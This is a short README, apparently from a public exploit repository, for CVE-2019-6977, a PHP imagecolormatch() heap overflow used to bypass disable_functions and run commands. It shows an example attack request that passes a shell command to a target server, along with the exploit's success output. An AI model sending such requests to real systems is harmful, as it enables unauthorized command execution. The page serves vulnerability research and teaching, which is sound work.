CVE-2019-6977 - WordPress 5.0 Remote Command Execution

# imagecolormatch() OOB Heap Write exploit

## Info

My binary exploit for [CVE-2019-6977](https://nvd.nist.gov/vuln/detail/CVE-2019-6977).
Bug found by Simon Scannell from RIPS.

PHP bug is [here](https://bugs.php.net/bug.php?id=77270).
Helps you bypass PHP’s `disable_functions` INI directive.

I commented **a lot** to help people that are new to binary PHP exploitation. Hope this helps.

## Output

```
GET http://target.com/exploit.php?f=0x7fe83d1bb480&c=id+>+/dev/shm/titi
```
```
Nenuphar.ce: 0x7fe834a10018
Nenuphar2.ce: 0x7fe834a10d70
Nenuphar.properties: 0x7fe834a01230
z.val: 0x7fe834aaea18
Difference: 0xad7e8

Exploit SUCCESSFUL !
```

From: https://github.com/cfreal/exploits/tree/master/CVE-2019-6977-imagecolormatch
